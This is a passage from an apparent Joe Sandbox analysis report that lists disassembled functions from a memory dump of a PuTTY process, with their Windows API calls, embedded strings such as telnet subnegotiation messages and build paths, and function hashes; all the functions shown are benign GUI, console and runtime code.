GetLastError.KERNEL32(?,?,?,?), ref: 00C5AE81
__dosmaperr.LIBCMT ref: 00C5AE88

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 6b316a47f11f486de8ba02e33518897027ab70f0f376dc7ab3122addd3eb1c01
Instruction ID: 7f8acd78450466a8059978831478410b1739997e7644388e8c23f7a591528d96
Opcode Fuzzy Hash: 6b316a47f11f486de8ba02e33518897027ab70f0f376dc7ab3122addd3eb1c01
Instruction Fuzzy Hash: 96212935200709AFCB21AF63CC8292BB7A8FF043667108A29FC25C7140D770ED9497AA

Function 00C531FB Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78679d4dc0392410c488bb0e772192261060c871350615eace151462cd8f0c5
Instruction ID: 3411ba55e6334ebcccc7100e5c2c20b7b9149ab60c0c7385bac3c51d9777e28f
Opcode Fuzzy Hash: c78679d4dc0392410c488bb0e772192261060c871350615eace151462cd8f0c5
Instruction Fuzzy Hash: A721F639200A86AFDB10AF71CC8592BB769BF403A6B104529FD25C7152D730EF889794

Function 00C5BB21 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00C5BB29

Part of subcall function 00C5BA6A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C60F69,?,00000000,-00000008), ref: 00C5BB16

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C5BB61
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C5BB81

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 0eb2afe674779fa9b781bebb007910a06ec1a122c3f8204fabef9b7fbf5b74fb
Instruction ID: 39ebc3375ed291b0b45aee6b7f5fdd1d68f0494a6bad8f62d3e2ac057c4d4c3d
Opcode Fuzzy Hash: 0eb2afe674779fa9b781bebb007910a06ec1a122c3f8204fabef9b7fbf5b74fb
Instruction Fuzzy Hash: 9311C8FA901515BF6B212B719D8ED6F2D6CDE853963100425FD02D2105EBA4CE86627C

Function 00BE9B40 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00BE9B52
GetWindowRect.USER32(00000000,?), ref: 00BE9B5E
GetWindowRect.USER32(?), ref: 00BE9B70
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,75BF3EB0,?,?,?,00BBDF7C,?), ref: 00BE9BBE

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$Rect$DesktopMove
String ID:
API String ID: 2894293738-0
Opcode ID: fb4d949d9a9cf5da1b00a108dd184ce1a06435fb9e0c8befe92f6b75529e3c75
Instruction ID: d91f78dd74749e02a9a62bf58892a15ddd95a264d73109d32822405da6c1f10b
Opcode Fuzzy Hash: fb4d949d9a9cf5da1b00a108dd184ce1a06435fb9e0c8befe92f6b75529e3c75
Instruction Fuzzy Hash: 611170716043496FC704DF69EC9CA1F77AAEFC8254F094A2DF98587380DA30E955C6A2

Function 00BA1928 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00BB5C70: GetCaretBlinkTime.USER32 ref: 00BB5C95

CreateCaret.USER32 ref: 00BA194D
ShowCaret.USER32 ref: 00BA1954
FlashWindow.USER32(00000000), ref: 00BA2D6E
DefWindowProcW.USER32(?,?,?,?), ref: 00BA3520

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Caret$Window$BlinkCreateFlashProcShowTime
String ID:
API String ID: 3048652251-0
Opcode ID: 3c0ba589f0d6ea454c11b04a62d3a88c993fc31159f101ffda9ad5c8de061c94
Instruction ID: ac66e2bb81dd43c311b877e5b488b097e0c47e951a0eefb400770a2da2860ccd
Opcode Fuzzy Hash: 3c0ba589f0d6ea454c11b04a62d3a88c993fc31159f101ffda9ad5c8de061c94
Instruction Fuzzy Hash: 9C1193B5508280EBD7259F14ED69B6E7BF4F746308F00402DF58587271DB7A0908EB61

Function 00BA9B00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

SetCaretPos.USER32(FFFFFFFF,FFFFFFFF), ref: 00BA9B32
ImmGetContext.IMM32 ref: 00BA9B55
ImmSetCompositionWindow.IMM32(00000000), ref: 00BA9B79
ImmReleaseContext.IMM32(00000000,00000000), ref: 00BA9B85

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Context$CaretCompositionReleaseWindow
String ID:
API String ID: 3049481515-0
Opcode ID: 184129b2059a49d212c4f2af5745b9ece71679006344496310eb386a0d068174
Instruction ID: 0614361d112d7a027aae289f599b3296d1b114337cf4dfecc1d8b624a08e8efe
Opcode Fuzzy Hash: 184129b2059a49d212c4f2af5745b9ece71679006344496310eb386a0d068174
Instruction Fuzzy Hash: C3014CB0609220AFDB28DB28FD85B5E7BE4EB4B358F448058F845C7271D7309885EBA1

Function 00BA5DA0 Relevance: 6.0, APIs: 4, Instructions: 44windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00BA5DE1
DestroyIcon.USER32(FFFFFFFF,00000000,?,?,00BAB1A1,00000001,?,?,?,?,?,00BA5C06,?,00BA2A54), ref: 00BA5DF0
DeleteObject.GDI32(?), ref: 00BA5E18
CoUninitialize.OLE32(00000001,?,?,?,?,?,00BA5C06,?,00BA2A54), ref: 00BA5E2D

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: DeleteObject$DestroyIconUninitialize
String ID:
API String ID: 1128191211-0
Opcode ID: 26887a669762da95e2062a12743113e11d556680e34073972de17c9ba27076b0
Instruction ID: d3df20a27e1658d92b4c91fdd3d4bc19a2b9bfadd862657508cce84b204bffd7
Opcode Fuzzy Hash: 26887a669762da95e2062a12743113e11d556680e34073972de17c9ba27076b0
Instruction Fuzzy Hash: 09016DB01086519BC720AF34EC9DF1E77D9AB43368B180A69F461C36E1CB39DA01D761

Function 00BA1767 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

ImmGetContext.IMM32 ref: 00BA176C
ImmSetCompositionFontA.IMM32(00000000,00CA3D88), ref: 00BA1779
ImmReleaseContext.IMM32(?,00000000,00000000,00CA3D88), ref: 00BA1780
DefWindowProcW.USER32(?,?,?,?), ref: 00BA3520

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Context$CompositionFontProcReleaseWindow
String ID:
API String ID: 3677218219-0
Opcode ID: 1478e25f3f4634be4fbf5cb59655a357fb58679c757a08bb30798693ee0c1056
Instruction ID: aedbeb27f82b98c82b544c276dcbdec47edcd40bd53283f521ff5d5cff5a8575
Opcode Fuzzy Hash: 1478e25f3f4634be4fbf5cb59655a357fb58679c757a08bb30798693ee0c1056
Instruction Fuzzy Hash: 22E02B317442081BC12433295C9597FB2DDAFE7750F04453FB84587202DC745D0663A1

Function 00C6655B Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00C64BE5,00000000,00000001,00000000,00000000,?,00C5D9C9,00000000,00000000,00000000), ref: 00C66572
GetLastError.KERNEL32(?,00C64BE5,00000000,00000001,00000000,00000000,?,00C5D9C9,00000000,00000000,00000000,00000000,00000000,?,00C5D314,?), ref: 00C6657E

Part of subcall function 00C665CF: CloseHandle.KERNEL32(FFFFFFFE,00C6658E,?,00C64BE5,00000000,00000001,00000000,00000000,?,00C5D9C9,00000000,00000000,00000000,00000000,00000000), ref: 00C665DF

___initconout.LIBCMT ref: 00C6658E

Part of subcall function 00C665B0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C6654C,00C64BD2,00000000,?,00C5D9C9,00000000,00000000,00000000,00000000), ref: 00C665C3

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00C64BE5,00000000,00000001,00000000,00000000,?,00C5D9C9,00000000,00000000,00000000,00000000), ref: 00C665A3

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ab9a191ed1cb13a4e87372431f79f7981d8ad4d89993abe69d327e1bb293dacd
Instruction ID: 03022b4aa8cedc1373f01ff7cdc200aecab16e2b12727d9ac6ecd0baf7ff2adb
Opcode Fuzzy Hash: ab9a191ed1cb13a4e87372431f79f7981d8ad4d89993abe69d327e1bb293dacd
Instruction Fuzzy Hash: 1EF03737000118BBCF222FA5DC09B8D3F25FF09360B054016F91A85131C63189219BD0

Function 00BBDAA0 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

EnableWindow.USER32(?,00000000), ref: 00BBDAAF
DialogBoxParamA.USER32(0000006F,?,00BBDAE0,00000000), ref: 00BBDAC1
EnableWindow.USER32(?,00000001), ref: 00BBDACA
SetActiveWindow.USER32(?), ref: 00BBDACD

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$Enable$ActiveDialogParam
String ID:
API String ID: 1750746890-0
Opcode ID: 51c70642d549c21bd323f315da37d60c265b61233fc3c72a0bc21019da3718e6
Instruction ID: 2d5d5056d8669b15ff07d764ed5d7f62f19cb009171749ba2b096ada7afb37b4
Opcode Fuzzy Hash: 51c70642d549c21bd323f315da37d60c265b61233fc3c72a0bc21019da3718e6
Instruction Fuzzy Hash: B2D01231246560B7D5222B55BC0DFCF3B29DFC6761F11002AF601B60E046E56443CAA9

Function 00BCB710 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 304COMMON

Download Yara Rule

Strings

server subnegotiation: SB TTYPE SEND, xrefs: 00BCBA29
client subnegotiation: SB TTYPE IS %s, xrefs: 00BCBA3F

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE SEND
API String ID: 0-571888287
Opcode ID: ff0b4767783587e3dd129cdde486f8dd21a755c469c83b75c1c1b0480a6e44d5
Instruction ID: 9e6abc2256a8ad81a834f4073a1f987d5262a55295bad555a3f77f4c925d4cf4
Opcode Fuzzy Hash: ff0b4767783587e3dd129cdde486f8dd21a755c469c83b75c1c1b0480a6e44d5
Instruction Fuzzy Hash: FAB103706083459FD710DB28C896F2EB7E5EB95314F1486ADF49A8B3D2D332D841D7A2

Function 00BCB96F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BCB9B0

Strings

server subnegotiation: SB TTYPE SEND, xrefs: 00BCBA29
client subnegotiation: SB TTYPE IS %s, xrefs: 00BCBA3F

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE SEND
API String ID: 4218353326-571888287
Opcode ID: a009a15888e82801af2d793f2101d8b9b940daa15818218dc8a4101e1d39b5df
Instruction ID: 093881c98019635b7cccc2f9068e056fc130ef659558879d6484670aeafa7875
Opcode Fuzzy Hash: a009a15888e82801af2d793f2101d8b9b940daa15818218dc8a4101e1d39b5df
Instruction Fuzzy Hash: 58910570A083459BD7209B28C897F2EB7D5EB51324F1486ADF4A68B3E2D332D845D762

Function 00BCB947 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 249COMMON

Download Yara Rule

Strings

server subnegotiation: SB TTYPE SEND, xrefs: 00BCBA29
client subnegotiation: SB TTYPE IS %s, xrefs: 00BCBA3F

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE SEND
API String ID: 0-571888287
Opcode ID: aa5d54e9150ee3345a2783082b3e8754743a4f8f85e26195b7df1f635d525dbb
Instruction ID: a4ebdf04a2e780644ddca278ae1f6a8c403343b8a942f7e863ca3e406c5a5177
Opcode Fuzzy Hash: aa5d54e9150ee3345a2783082b3e8754743a4f8f85e26195b7df1f635d525dbb
Instruction Fuzzy Hash: 44910670608345DBD7109B28C897F2EB7D5EB51314F1486ADF4968B3E2D332D845D762

Function 00BDEB20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?), ref: 00BDEBF0

Strings

p - mbstr < mblen, xrefs: 00BDEC83, 00BDECC1, 00BDED35, 00BDED6C
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/unicode.c, xrefs: 00BDEC7E, 00BDECBC, 00BDED30, 00BDED67

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/unicode.c$p - mbstr < mblen
API String ID: 626452242-1134606155
Opcode ID: b397dc5ccb4cf54cdc26a867a81dabd3236d4998dd2f423b0600d7a47405593e
Instruction ID: 064de78e6d024c78180754a4e59f1cf9bf3cf8660ffd4ed64ef135f423fcee35
Opcode Fuzzy Hash: b397dc5ccb4cf54cdc26a867a81dabd3236d4998dd2f423b0600d7a47405593e
Instruction Fuzzy Hash: 0651A2706483459BC724EF14C8C5B6BB7E1EF94704F1849AEE8A98F341EB71E905CB92

Function 00BD3810 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00BD38FD
___from_strstr_to_strchr.LIBCMT ref: 00BD391B

Strings

TerminalModes, xrefs: 00BD383D, 00BD384D

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ___from_strstr_to_strchr
String ID: TerminalModes
API String ID: 601868998-3469332156
Opcode ID: 35d09e75b79f288044e61a856f1a52a43c714cffa6c7e8bfd7726912a122fe7d
Instruction ID: 2e3db42dddeda8ed96bdae8006063bab90dc3a601e24d1559293b34ebd641c35
Opcode Fuzzy Hash: 35d09e75b79f288044e61a856f1a52a43c714cffa6c7e8bfd7726912a122fe7d
Instruction Fuzzy Hash: 74314DE690428867E72016252C62B37B6CC8B92B48F0904B7FD8A57343F55B9E04A377

Function 00C02870 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C028F0

Strings

false && "unhandled node type in exprnode_free", xrefs: 00C028CE
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/utils/cert-expr.c, xrefs: 00C028C9

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/utils/cert-expr.c$false && "unhandled node type in exprnode_free"
API String ID: 4218353326-839404475
Opcode ID: 0bc2f82a82b9abadbabf86345411ffd3a91a93c25ac92d81b53b839cb8040b88
Instruction ID: f7d9514b2e9b820bed24d9b9fe79606759898d9a0c3990b9dad9ce4cea839aba
Opcode Fuzzy Hash: 0bc2f82a82b9abadbabf86345411ffd3a91a93c25ac92d81b53b839cb8040b88
Instruction Fuzzy Hash: 5A317977A0020097E7106E28EC5A66EB3E9EF82375F09822EE45A073D1E7319D45D7D2

Function 00BC55A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00BC55B5
___from_strstr_to_strchr.LIBCMT ref: 00BC55C4

Strings

Event Log: %s, xrefs: 00BC5633, 00BC567B

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ___from_strstr_to_strchr
String ID: Event Log: %s
API String ID: 601868998-1617424366
Opcode ID: e7d2130d563c5ed037e922ea7dae3028c6867d19f87a6947df428a4725a88954
Instruction ID: 8c743890298477335df9363acf9ebff51181b849acabb9ca7a6f595188474c41
Opcode Fuzzy Hash: e7d2130d563c5ed037e922ea7dae3028c6867d19f87a6947df428a4725a88954
Instruction Fuzzy Hash: 7C210671500D006BDB319A24DC46F2A77D5FF13329F9802BDF84686651E722F8D4D6A7

Function 00C63722 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00C6372B

Strings

csm, xrefs: 00C637BE
csm, xrefs: 00C6374D

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 3d30ccd1ceba34092cafc4d0f1a3b2e4368bc3923c79130f7ce692f233f60925
Instruction ID: 61de5370cb959831fa478f485c4a5b944dd151bdb3535f871f7925d53363173f
